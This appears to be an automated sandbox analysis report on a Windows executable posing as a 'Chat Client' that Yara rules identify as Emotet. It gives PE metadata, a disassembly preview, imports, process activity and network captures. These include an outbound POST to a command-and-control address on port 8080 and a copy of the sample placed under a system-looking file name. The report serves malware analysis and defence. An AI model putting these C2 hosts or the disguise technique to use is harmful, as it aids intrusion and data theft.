Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5F17351E [Tue Jul 21 18:34:06 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	cc8e14cc73aaa83c68c2cab2e4569a4a

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 0042F6E0h
push 00426C04h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [00444E38h]
pop ecx
or dword ptr [00442358h], FFFFFFFFh
or dword ptr [00442368h], FFFFFFFFh
call dword ptr [00444E34h]
mov ecx, dword ptr [00442344h]
mov dword ptr [eax], ecx
call dword ptr [00444E30h]
mov ecx, dword ptr [00442340h]
mov dword ptr [eax], ecx
mov eax, dword ptr [00444E2Ch]
mov eax, dword ptr [eax]
mov dword ptr [0044234Ch], eax
call 00007F9AF0A62629h
cmp dword ptr [00441F28h], ebx
jne 00007F9AF0A624FEh
push 00426BEEh
call dword ptr [00444E28h]
pop ecx
call 00007F9AF0A625F5h
push 0043453Ch
push 00434438h
call 00007F9AF0A625E0h
mov eax, dword ptr [0044233Ch]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [00442338h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [00444E20h]
push 00434334h
push 00434000h
call 00007F9AF0A625ADh

Rich Headers

Programming Language:

[ C ] VS98 (6.0) build 8168
[RES] VS98 (6.0) cvtres build 1720
[C++] VS98 (6.0) build 8168
[LNK] VS98 (6.0) imp/exp build 8168

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x43000	0xf0	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x47000	0x50db6	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x98000	0x3498	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2c000	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x440e8	0xff8	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2a582	0x2b000	False	0.38004746548	data	5.67133755178	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x2c000	0x7e09	0x8000	False	0.200836181641	data	3.36722384809	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x34000	0xe36c	0xf000	False	0.601025390625	data	6.55377024945	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata	0x43000	0x30c4	0x4000	False	0.418884277344	data	5.40943228286	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x47000	0x50db6	0x51000	False	0.0778145495756	data	2.26539374393	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x98000	0x40d8	0x5000	False	0.443603515625	data	5.15637170762	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RGN	0x88f88	0x2d0	dBase III DBT, version number 0, next free block index 32, 1st item "\021"	English	United States
RT_BITMAP	0x4b5e0	0x2e8	data	English	United States
RT_BITMAP	0x4b8c8	0xe8	GLS_BINARY_LSB_FIRST	English	United States
RT_BITMAP	0x4b9b0	0x668	dBase IV DBT, blocks size 0, block length 1536, next free block index 40, next free block 2290649224, next used block 2156431496	English	United States
RT_BITMAP	0x4c018	0x3bfd0	data	English	United States
RT_ICON	0x482b0	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 3149607731, next used block 0	English	United States
RT_ICON	0x485b0	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x486f0	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x48830	0x2e8	data	English	United States
RT_ICON	0x48b18	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x48c68	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 3149607731, next used block 0	English	United States
RT_ICON	0x48f68	0x2e8	data	English	United States
RT_ICON	0x49268	0x2e8	data	English	United States
RT_ICON	0x49568	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 3149642683, next used block 48059	English	United States
RT_ICON	0x49868	0x2e8	data	English	United States
RT_ICON	0x49b68	0x2e8	data	English	United States
RT_ICON	0x49e68	0x2e8	data	English	United States
RT_ICON	0x4a168	0x2e8	data	English	United States
RT_ICON	0x4a468	0x2e8	data	English	United States
RT_ICON	0x4a768	0x2e8	data	English	United States
RT_ICON	0x4aa68	0x2e8	data	English	United States
RT_ICON	0x4ad68	0x2e8	data	English	United States
RT_ICON	0x4b068	0x2e8	data	English	United States
RT_ICON	0x4b350	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x4b4a0	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_MENU	0x88040	0x2d0	data	English	United States
RT_MENU	0x88310	0x44	data	English	United States
RT_MENU	0x88358	0x6c	data	English	United States
RT_DIALOG	0x88438	0x78	data	English	United States
RT_DIALOG	0x884b0	0x1c6	data	English	United States
RT_DIALOG	0x88678	0x112	data	English	United States
RT_DIALOG	0x88790	0x440	data	English	United States
RT_STRING	0x89258	0x6c	data	English	United States
RT_STRING	0x892c8	0x4a	data	English	United States
RT_STRING	0x89eb8	0x246	data	English	United States
RT_STRING	0x89c38	0xd8	data	English	United States
RT_STRING	0x89d10	0x1a2	data	English	United States
RT_STRING	0x8a100	0x3a4	data	English	United States
RT_STRING	0x8a4a8	0x236	data	English	United States
RT_STRING	0x8a6e0	0x17a	data	English	United States
RT_STRING	0x89318	0x54	data	English	United States
RT_STRING	0x893b8	0x296	data	English	United States
RT_STRING	0x89810	0x70	data	English	United States
RT_STRING	0x89650	0xdc	data	English	United States
RT_STRING	0x89730	0xda	data	English	United States
RT_STRING	0x89370	0x46	data	English	United States
RT_STRING	0x89880	0xc6	data	English	United States
RT_STRING	0x89948	0x1f8	data	English	United States
RT_STRING	0x89b40	0x86	data	English	United States
RT_STRING	0x89bc8	0x6e	data	English	United States
RT_ACCELERATOR	0x883c8	0x70	data	English	United States
RT_GROUP_ICON	0x48598	0x14	data	English	United States
RT_GROUP_ICON	0x486d8	0x14	data	English	United States
RT_GROUP_ICON	0x48818	0x14	data	English	United States
RT_GROUP_ICON	0x48c40	0x22	data	English	United States
RT_GROUP_ICON	0x48f50	0x14	data	English	United States
RT_GROUP_ICON	0x49250	0x14	data	English	United States
RT_GROUP_ICON	0x49550	0x14	data	English	United States
RT_GROUP_ICON	0x49850	0x14	data	English	United States
RT_GROUP_ICON	0x49b50	0x14	data	English	United States
RT_GROUP_ICON	0x49e50	0x14	data	English	United States
RT_GROUP_ICON	0x4a150	0x14	data	English	United States
RT_GROUP_ICON	0x4a450	0x14	data	English	United States
RT_GROUP_ICON	0x4a750	0x14	data	English	United States
RT_GROUP_ICON	0x4aa50	0x14	data	English	United States
RT_GROUP_ICON	0x4ad50	0x14	data	English	United States
RT_GROUP_ICON	0x4b050	0x14	data	English	United States
RT_GROUP_ICON	0x4b478	0x22	data	English	United States
RT_GROUP_ICON	0x4b5c8	0x14	data	English	United States
RT_VERSION	0x88bd0	0x3b4	data	English	United States
None	0x87fe8	0x18	data	English	United States
None	0x88000	0xa	data	English	United States
None	0x88010	0x30	data	English	United States

Imports

DLL	Import
MFC42.DLL
MSVCRT.dll	_setmbcp, __CxxFrameHandler, _EH_prolog, atoi, _mbscmp, free, malloc, wcscpy, wcslen, _ftol, wcscmp, memmove, __dllonexit, _onexit, ??1type_info@@UAE@XZ, _exit, _XcptFilter, exit, _acmdln, __getmainargs, _initterm, __setusermatherr, _adjust_fdiv, __p__commode, __p__fmode, __set_app_type, _except_handler3, _controlfp, printf
KERNEL32.dll	GetModuleHandleA, SizeofResource, OpenFileMappingA, CreateFileMappingA, MapViewOfFile, UnmapViewOfFile, CloseHandle, MultiByteToWideChar, lstrcmpiA, FindResourceA, LoadResource, LockResource, GetCPInfo, lstrlenW, lstrlenA, GetVersion, GetVersionExA, MulDiv, GetModuleFileNameA, DeleteFileA, GetTickCount, LoadLibraryA, FreeLibrary, Sleep, LoadLibraryExA, GetProcAddress, GetCurrentProcess, GetStartupInfoA
USER32.dll	RemoveMenu, TabbedTextOutA, GrayStringA, LoadImageA, DrawIcon, SetRectEmpty, IsMenu, SetMenuDefaultItem, SetForegroundWindow, IsIconic, GetLastActivePopup, SetWindowRgn, IsWindow, FrameRect, EnumChildWindows, GetAsyncKeyState, GetMenuItemID, KillTimer, GetWindowRect, SetTimer, ScreenToClient, PtInRect, EnableWindow, InvalidateRect, LoadIconA, GetDC, GetClientRect, LoadBitmapA, FillRect, ReleaseDC, UpdateWindow, GetSystemMenu, SendMessageA, ShowWindow, GetMenuState, ModifyMenuA, GetMenuItemCount, InsertMenuA, GetSystemMetrics, DrawTextA, DrawIconEx, DestroyIcon, DrawEdge, SetRect, GetMenuItemInfoA, PostMessageA, DeleteMenu, AppendMenuA, SetParent, wsprintfA, GetDCEx, ReleaseCapture, SetCapture, RedrawWindow, GetWindow, GetClassLongA, GetMenuStringA, CreateMenu, CreatePopupMenu, GetSysColor, GetSubMenu, ClientToScreen, GetParent, BeginDeferWindowPos, EndDeferWindowPos, IsRectEmpty, GetSysColorBrush, GetCursorPos, LoadCursorA, GetKeyState, OffsetRect, CopyRect, InflateRect, SystemParametersInfoA, GetFocus, IsChild, IsWindowVisible, GetDesktopWindow, SetMenu, GetMenu
GDI32.dll	CreateSolidBrush, GetTextExtentPoint32W, GetTextExtentPoint32A, Ellipse, DeleteDC, DeleteObject, SelectObject, CreateDIBSection, SetPixel, GetPixel, PtVisible, CreatePen, TextOutA, Escape, Rectangle, CreateHatchBrush, RealizePalette, CreatePalette, GetTextMetricsA, GetCurrentObject, ExtCreateRegion, GetDIBColorTable, CreateHalftonePalette, GetBkMode, PatBlt, CreateCompatibleBitmap, BitBlt, GetTextColor, GetDeviceCaps, GetObjectA, CreateFontIndirectA, ExtTextOutA, RectVisible, EnumFontFamiliesA, CreateCompatibleDC
ADVAPI32.dll	RegCloseKey, RegOpenKeyExA, RegQueryValueExA
SHELL32.dll	Shell_NotifyIconA, SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_GetIcon, ImageList_AddMasked, ImageList_Draw, ImageList_GetImageCount, ImageList_GetIconSize
ole32.dll	CoUninitialize, CoInitialize, CoCreateInstance
WSOCK32.dll	inet_addr, gethostname, gethostbyname
MSVCP60.dll	??1Init@ios_base@std@@QAE@XZ, ??0Init@ios_base@std@@QAE@XZ, ??1_Winit@std@@QAE@XZ, ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z, ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z, ??1_Lockit@std@@QAE@XZ, ??0_Lockit@std@@QAE@XZ, ??0_Winit@std@@QAE@XZ

Version Infos

Description	Data
LegalCopyright	Copyright (C) DCUtility 2002
InternalName	Chat Client
FileVersion	1.0B
CompanyName	DCUtility
PrivateBuild
LegalTrademarks	All Rigths Reseved
Comments	Enjoy the net!
ProductName	Chat Client Application
SpecialBuild
ProductVersion	1.0B
FileDescription	Chat With US Client
OriginalFilename	Chat Client.EXE
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 13, 2021 08:27:35.137639999 CEST	49748	80	192.168.2.5	94.49.254.194
Sep 13, 2021 08:27:38.140754938 CEST	49748	80	192.168.2.5	94.49.254.194
Sep 13, 2021 08:27:44.141060114 CEST	49748	80	192.168.2.5	94.49.254.194
Sep 13, 2021 08:27:59.325620890 CEST	49760	8080	192.168.2.5	212.51.142.238
Sep 13, 2021 08:28:02.439457893 CEST	49760	8080	192.168.2.5	212.51.142.238
Sep 13, 2021 08:28:08.439930916 CEST	49760	8080	192.168.2.5	212.51.142.238
Sep 13, 2021 08:28:23.691495895 CEST	49793	8080	192.168.2.5	91.231.166.124
Sep 13, 2021 08:28:23.772044897 CEST	8080	49793	91.231.166.124	192.168.2.5
Sep 13, 2021 08:28:24.285111904 CEST	49793	8080	192.168.2.5	91.231.166.124
Sep 13, 2021 08:28:24.387702942 CEST	8080	49793	91.231.166.124	192.168.2.5
Sep 13, 2021 08:28:24.894526005 CEST	49793	8080	192.168.2.5	91.231.166.124
Sep 13, 2021 08:28:24.941026926 CEST	8080	49793	91.231.166.124	192.168.2.5
Sep 13, 2021 08:28:28.352049112 CEST	49794	8080	192.168.2.5	162.241.92.219
Sep 13, 2021 08:28:28.489171028 CEST	8080	49794	162.241.92.219	192.168.2.5
Sep 13, 2021 08:28:28.489769936 CEST	49794	8080	192.168.2.5	162.241.92.219
Sep 13, 2021 08:28:28.490725994 CEST	49794	8080	192.168.2.5	162.241.92.219
Sep 13, 2021 08:28:28.490906954 CEST	49794	8080	192.168.2.5	162.241.92.219
Sep 13, 2021 08:28:28.629339933 CEST	8080	49794	162.241.92.219	192.168.2.5
Sep 13, 2021 08:28:28.629364014 CEST	8080	49794	162.241.92.219	192.168.2.5
Sep 13, 2021 08:28:28.629373074 CEST	8080	49794	162.241.92.219	192.168.2.5
Sep 13, 2021 08:28:31.751209974 CEST	8080	49794	162.241.92.219	192.168.2.5
Sep 13, 2021 08:28:31.751508951 CEST	49794	8080	192.168.2.5	162.241.92.219
Sep 13, 2021 08:28:34.010751963 CEST	49795	8080	192.168.2.5	79.98.24.39
Sep 13, 2021 08:28:34.752852917 CEST	8080	49794	162.241.92.219	192.168.2.5
Sep 13, 2021 08:28:34.753180981 CEST	49794	8080	192.168.2.5	162.241.92.219
Sep 13, 2021 08:28:37.020678043 CEST	49795	8080	192.168.2.5	79.98.24.39
Sep 13, 2021 08:28:43.021047115 CEST	49795	8080	192.168.2.5	79.98.24.39

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 13, 2021 08:26:29.248089075 CEST	54795	53	192.168.2.5	8.8.8.8
Sep 13, 2021 08:26:29.281991005 CEST	53	54795	8.8.8.8	192.168.2.5
Sep 13, 2021 08:26:46.492850065 CEST	49557	53	192.168.2.5	8.8.8.8
Sep 13, 2021 08:26:46.527241945 CEST	53	49557	8.8.8.8	192.168.2.5
Sep 13, 2021 08:26:58.495861053 CEST	59736	53	192.168.2.5	8.8.8.8
Sep 13, 2021 08:26:58.520549059 CEST	53	59736	8.8.8.8	192.168.2.5
Sep 13, 2021 08:26:58.539895058 CEST	51058	53	192.168.2.5	8.8.8.8
Sep 13, 2021 08:26:58.565072060 CEST	53	51058	8.8.8.8	192.168.2.5
Sep 13, 2021 08:26:58.730571985 CEST	52636	53	192.168.2.5	8.8.8.8
Sep 13, 2021 08:26:58.755280972 CEST	53	52636	8.8.8.8	192.168.2.5
Sep 13, 2021 08:26:59.480966091 CEST	61733	53	192.168.2.5	8.8.8.8
Sep 13, 2021 08:26:59.528287888 CEST	53	61733	8.8.8.8	192.168.2.5
Sep 13, 2021 08:27:01.313838959 CEST	65447	53	192.168.2.5	8.8.8.8
Sep 13, 2021 08:27:01.347924948 CEST	53	65447	8.8.8.8	192.168.2.5
Sep 13, 2021 08:27:06.682511091 CEST	52441	53	192.168.2.5	8.8.8.8
Sep 13, 2021 08:27:06.718514919 CEST	53	52441	8.8.8.8	192.168.2.5
Sep 13, 2021 08:27:17.960165024 CEST	62176	53	192.168.2.5	8.8.8.8
Sep 13, 2021 08:27:18.006695032 CEST	53	62176	8.8.8.8	192.168.2.5
Sep 13, 2021 08:27:21.658696890 CEST	59596	53	192.168.2.5	8.8.8.8
Sep 13, 2021 08:27:21.695820093 CEST	53	59596	8.8.8.8	192.168.2.5
Sep 13, 2021 08:27:34.746093035 CEST	65296	53	192.168.2.5	8.8.8.8
Sep 13, 2021 08:27:34.774172068 CEST	53	65296	8.8.8.8	192.168.2.5
Sep 13, 2021 08:27:42.526637077 CEST	63183	53	192.168.2.5	8.8.8.8
Sep 13, 2021 08:27:42.570143938 CEST	53	63183	8.8.8.8	192.168.2.5
Sep 13, 2021 08:27:53.675683975 CEST	60151	53	192.168.2.5	8.8.8.8
Sep 13, 2021 08:27:53.708574057 CEST	53	60151	8.8.8.8	192.168.2.5
Sep 13, 2021 08:27:53.985280037 CEST	56969	53	192.168.2.5	8.8.8.8
Sep 13, 2021 08:27:54.020380974 CEST	53	56969	8.8.8.8	192.168.2.5
Sep 13, 2021 08:27:59.624249935 CEST	55161	53	192.168.2.5	8.8.8.8
Sep 13, 2021 08:27:59.657026052 CEST	53	55161	8.8.8.8	192.168.2.5
Sep 13, 2021 08:28:06.832488060 CEST	54757	53	192.168.2.5	8.8.8.8
Sep 13, 2021 08:28:06.870181084 CEST	53	54757	8.8.8.8	192.168.2.5
Sep 13, 2021 08:28:13.741797924 CEST	49992	53	192.168.2.5	8.8.8.8
Sep 13, 2021 08:28:13.769840956 CEST	53	49992	8.8.8.8	192.168.2.5
Sep 13, 2021 08:28:14.632811069 CEST	60075	53	192.168.2.5	8.8.8.8
Sep 13, 2021 08:28:14.679052114 CEST	53	60075	8.8.8.8	192.168.2.5
Sep 13, 2021 08:28:18.260802984 CEST	55016	53	192.168.2.5	8.8.8.8
Sep 13, 2021 08:28:18.293131113 CEST	53	55016	8.8.8.8	192.168.2.5
Sep 13, 2021 08:28:34.923656940 CEST	64345	53	192.168.2.5	8.8.8.8
Sep 13, 2021 08:28:34.952136993 CEST	53	64345	8.8.8.8	192.168.2.5
Sep 13, 2021 08:28:35.368444920 CEST	57128	53	192.168.2.5	8.8.8.8
Sep 13, 2021 08:28:35.397584915 CEST	53	57128	8.8.8.8	192.168.2.5
Sep 13, 2021 08:28:42.223109961 CEST	54791	53	192.168.2.5	8.8.8.8
Sep 13, 2021 08:28:42.255695105 CEST	53	54791	8.8.8.8	192.168.2.5
Sep 13, 2021 08:28:42.527976990 CEST	50463	53	192.168.2.5	8.8.8.8
Sep 13, 2021 08:28:42.570426941 CEST	53	50463	8.8.8.8	192.168.2.5

HTTP Request Dependency Graph

162.241.92.219

162.241.92.219:8080

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49794	162.241.92.219	8080	C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe

Timestamp	kBytes transferred	Direction	Data
Sep 13, 2021 08:28:28.490725994 CEST	4300	OUT	POST /YfyuG6sm3RqTIqU9gu/RiTaftnIbMGtd/UGb4JhQL57NsD/ HTTP/1.1 Referer: http://162.241.92.219/YfyuG6sm3RqTIqU9gu/RiTaftnIbMGtd/UGb4JhQL57NsD/ Content-Type: multipart/form-data; boundary=---------------------------978213554566447 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 162.241.92.219:8080 Content-Length: 4548 Connection: Keep-Alive Cache-Control: no-cache
Sep 13, 2021 08:28:31.751209974 CEST	4306	IN	HTTP/1.1 502 Bad Gateway Server: nginx Date: Mon, 13 Sep 2021 06:28:31 GMT Content-Type: text/html Content-Length: 537 Connection: keep-alive ETag: "5677dae7-219" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 33 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 6e 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2e 3c 2f 68 31 3e 0a 3c 70 3e 53 6f 72 72 79 2c 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 62 72 2f 3e 0a 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 74 68 65 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 66 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 20 74 68 65 6e 20 79 6f 75 20 73 68 6f 75 6c 64 20 63 68 65 63 6b 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 67 69 6e 78 2e 6f 72 67 2f 72 2f 65 72 72 6f 72 5f 6c 6f 67 22 3e 65 72 72 6f 72 20 6c 6f 67 3c 2f 61 3e 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 3c 2f 70 3e 0a 3c 70 3e 3c 65 6d 3e 46 61 69 74 68 66 75 6c 6c 79 20 79 6f 75 72 73 2c 20 6e 67 69 6e 78 2e 3c 2f 65 6d 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html><head><title>Error</title><style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body><h1>An error occurred.</h1><p>Sorry, the page you are looking for is currently unavailable.<br/>Please try again later.</p><p>If you are the system administrator of this resource then you should checkthe <a href="http://nginx.org/r/error_log">error log</a> for details.</p><p><em>Faithfully yours, nginx.</em></p></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 8U5snojV8p.exe PID: 6372 Parent PID: 964

General

Start time:	08:26:35
Start date:	13/09/2021
Path:	C:\Users\user\Desktop\8U5snojV8p.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\8U5snojV8p.exe'
Imagebase:	0x400000
File size:	643178 bytes
MD5 hash:	0DF4AAFFD21ACF21FF44429CA485FAB8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.296805928.0000000000C21000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.296561787.0000000000670000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 6592 Parent PID: 556

General

Start time:	08:26:42
Start date:	13/09/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6780 Parent PID: 556

General

Start time:	08:26:53
Start date:	13/09/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6860 Parent PID: 556

General

Start time:	08:26:54
Start date:	13/09/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6956 Parent PID: 556

General

Start time:	08:26:56
Start date:	13/09/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 7028 Parent PID: 556

General

Start time:	08:26:57
Start date:	13/09/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: SgrmBroker.exe PID: 7076 Parent PID: 556

General

Start time:	08:26:58
Start date:	13/09/2021
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff6bf4d0000
File size:	163336 bytes
MD5 hash:	D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Windows.System.Profile.RetailInfo.exe PID: 4864 Parent PID: 6372

General

Start time:	08:26:59
Start date:	13/09/2021
Path:	C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\dbgeng\Windows.System.Profile.RetailInfo.exe
Imagebase:	0x400000
File size:	643178 bytes
MD5 hash:	0DF4AAFFD21ACF21FF44429CA485FAB8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.511924593.0000000000781000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.511863811.0000000000770000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: svchost.exe PID: 5368 Parent PID: 556

General

Start time:	08:26:59
Start date:	13/09/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 844 Parent PID: 556

General

Start time:	08:27:04
Start date:	13/09/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6740 Parent PID: 556

General

Start time:	08:27:41
